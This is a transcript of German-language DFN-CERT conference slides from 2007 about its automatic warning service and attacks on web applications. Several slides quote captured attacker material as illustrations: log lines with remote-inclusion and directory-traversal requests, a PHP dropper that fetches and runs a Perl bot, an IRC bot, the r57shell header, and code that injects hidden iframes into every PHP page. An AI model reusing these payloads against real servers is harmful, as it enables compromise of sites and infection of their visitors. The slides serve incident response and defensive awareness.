Neues aus dem DFN-CERT€¦ · Andreas Bunten, DFN-CERT Neues aus dem DFN-CERT. 47....
Transcript of Neues aus dem DFN-CERT€¦ · Andreas Bunten, DFN-CERT Neues aus dem DFN-CERT. 47....
47. DFN-Betriebstagung - Forum Sicherheit16. Oktober 2007 Andreas Bunten, DFN-CERT
Neues aus dem DFN-CERT
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 2
Tutorium „DFN-PKI in der Praxis“
22./23. Nov. 2007 in München (Ismaning) Telekom Training Tagungshotel Ismaning
● Allgemeine Anwendungen von PKI ● Detaillierte Einführung in den Dienst
DFN-PKI ● Praktische Beispiele
Veranstaltungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 3
Tutorium „Incident Response unter UNIX und Windows“
04./05. Dez. 2007 in Kassel
● Leitfaden zur Behandlung von Sicherheits-vorfällen
● Hands-On Tutorium; Live Übungen an kompromittierten Systemen
● Begrenzte Teilnehmerzahl
Veranstaltungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 4
Veranstaltungen
15. DFN Workshop „Sicherheit in vernetzten Systemen“
13./14. Februar 2008 im CCH Hamburg
● Keynote Speaker: Dick Hardt● Tutorium „Praktische Rechtsfragen“● Programm und Anmeldung ab Mitte
November online (Frühbucherrabatt)
Infos & Anmeldung: http://www.dfn-cert.de
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 5
● Neuigkeiten zum ThemaAutomatische Warnmeldungen
● Aktuelle Angriffe● Beispiel: Angriffe gegen Web-Anwendungen
Agenda
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 6
Grundlegende Idee:
● Das DFN-CERT sammelt Informationen zu möglichen Sicherheitsproblemen:● Registrierung bei SPAM- / Security-Communities● Automatisierte Suche in Foren / Listen● Auswertung der Daten aus eigenen Sensoren
● Überführung in einheitliches Format● Korrelieren und Zusammenfassen der Daten● Automatische Benachrichtigung betroffener
DFN-Anwender
Automatische Warnmeldungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 7
Automatische Warnmeldungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 8
Automatische Warnmeldungen
Statistik:
● 63 Einrichtungen● 218 definierte Netzblöcke● 2862485 IPs (ca. 31.5% des X-WiN)● 2234 Warnmeldungen verschickt
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 9
Vorfälle nach Kategorien in Prozent:
Automatische Warnmeldungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 10
Anmerkungen:
● Manche Hochschulen bekommen auch nach Anmeldung keine Warnmeldungen
● Viele SPAM-Meldungen, aber auch diese sind oft wertvoll
● Deutlich weniger Falschmeldungen● Manchmal melden wir NAT-Gateways
● Das betroffene System liegt i.d.R. dahinter● Mit Tricks kann evtl. das System bestimmt
werden● Teilnahme durch Mail an: <[email protected]>
Automatische Warnmeldungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 11
https://www.cert.dfn.de
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 12
Keine großen Überraschungen bzgl. aktueller Vorfälle:
● SPAM-Beschwerden● Scans● Account Probes● Phishing Sites● Angriffe auf Web-Anwendungen● Angriffe auf Webbrowser● Kompromittierungen
Ein Vorfall oft in mehreren Kategorien!
Aktuelle Vorfälle
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 13
Betroffen:
● Alle möglichen Anwendungen sind betroffen:● Content Management Systeme● Programme zur Logfile Analyse● Programme Administrations● Bulletin Boards● ...
● Prinzpiell auch alle Programmiersprachen / Frameworks betroffen
● Manche scheinen aber anfälliger zu sein ...
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 14
Was sind das für Schwachstellen?● Buffer / Heap / Integer Overflows● SQL Injection / Cross Site Scripting● ...
Leider besonders leicht auszunutzen:● Manche PHP-Anwendungen laden Code von
fremden Server nach
Wie finden die Angreifer meinen Server?● google● Portscans + Raten der Skript-Pfade
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 15
Wie sieht das in meinen Logs aus?
„GET /lib/base.php?BaseCfg[BaseDir]=http://www.x.de?“
„GET /phpmyadmin/main.php“
„POST /_vti_bin/_vti_aut/fp30reg.dll“
„SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H ...“
„GET /scripts/root.exe?/c+dir“
„GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir“
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 16
Was wird denn nachgeladen?Ein Skript das weiter nachlädt (PHP)
<?php$url="http://www.xxxxxx.xxxxxxxx.es/";echo exec('killall -9 perl;');echo passthru('killall -9 perl;');echo system('killall -9 perl;');echo shell_exec('killall -9 perl;');echo exec('cd /tmp;curl -O '.$url.'bot.txt;perl
bot.txt;rm -f bot.txt*;');echo exec('cd /tmp;GET '.$url.'bot.txt >
bot.txt;perl bot.txt;rm -f bot.txt*;');[...]
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 17
Was wird denn nachgeladen?Ein Bot-Skript (Perl)
$servidor='irc.xxxxxxxxxx.de' unless $servidor;my $porta='6667';my @canais=("#own own");my @adms=("s1ko");
my $linas_max=10;my $sleep=3;
my $nick = getnick();my $ircname = getnick();my $realname = getnick();[...]
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 18
Was wird denn nachgeladen?Ein Status-Skript (PHP)
<?$dir = @getcwd();$ker = @php_uname();echo "31337<br>";$OS = @PHP_OS;echo "<br>OSTYPE:$OS<br>";echo "<br>Kernel:$ker<br>";$free = disk_free_space($dir); if ($free === FALSE) {$free = 0;} if ($free < 0) {$free = 0;} [...]
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 19
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 20
Was wird denn nachgeladen?Eine Shell (PHP)
<?php/******************************************************************************************************//* # # # # /* # # # #/* # # # #/* # ## #### ## #/* ## ## ###### ## ##/* ## ## ###### ## ##/* ## ## #### ## ##/* ### ############ ###/* ########################/* ##############/* ######## ########## #######/* ### ## ########## ## ###/* ### ## ########## ## ###/* ### # ########## # ###/* ### ## ######## ## ###/* ## # ###### # ##/* ## # #### # ##/* ## ##/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 21
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 22
Was wird denn nachgeladen?Code zum „Ergänzen“ Ihrer Webseiten
[...]$codigo = "<IFRAME src=\"www.x.de/morgan.html\"
width=\"0\" height=\"0\" frameborder=\"0\"> </iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) { $fp=fopen($archivo,"a+"); fputs($fp,$codigo);}[...]
Angriffe auf Web-Anwendungen
Jetzt enthält jede Ihrer PHP-Seiten einen zusätzlichen iFrame !
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 23
Was bedeutet dieser iFrame?
● iFrame:● Ein Inline-Frame, der i.d.R. externe Inhalte in
eine vorhandene Seite einbettet● Dieser iFrame ist unsichtbar● Es werden Daten vom Webserver der Angreifer in
den Browser des Benutzers nachgeladen !● Möglichkeiten des Angreifers:
● Ausnutzung von Browser-Schwachstellen● Installation eines Trojaners / Virus
Besucher Ihrer Website werden infiziert!
Angriffe auf Web-Anwendungen
47. DFN-Betriebstagung, 16. Oktober 2007 / Andreas Bunten Folie 24
Was kann man tun?
● Dynamische Inhalte vermeiden, wenn diese nicht notwendig
● Komplexe Web-Anwendungen auf eigene (virtuelle) Server verbannen
● PHP vorsichtig konfigurieren !● Automatische Warnmeldungen buchen
● Ein erfolgreicher Angriff fällt i.d.R. durch Scans, Account Probes & Versand von SPAM auf
● Angriffe ans CERT melden
Angriffe auf Web-Anwendungen
Vielen Dank für Ihre Aufmerksamkeit!
● Anmeldung für die Automatischen Warnmeldungen per Mail an: [email protected]
● Weitere Informationen unter: https://www.cert.dfn.de/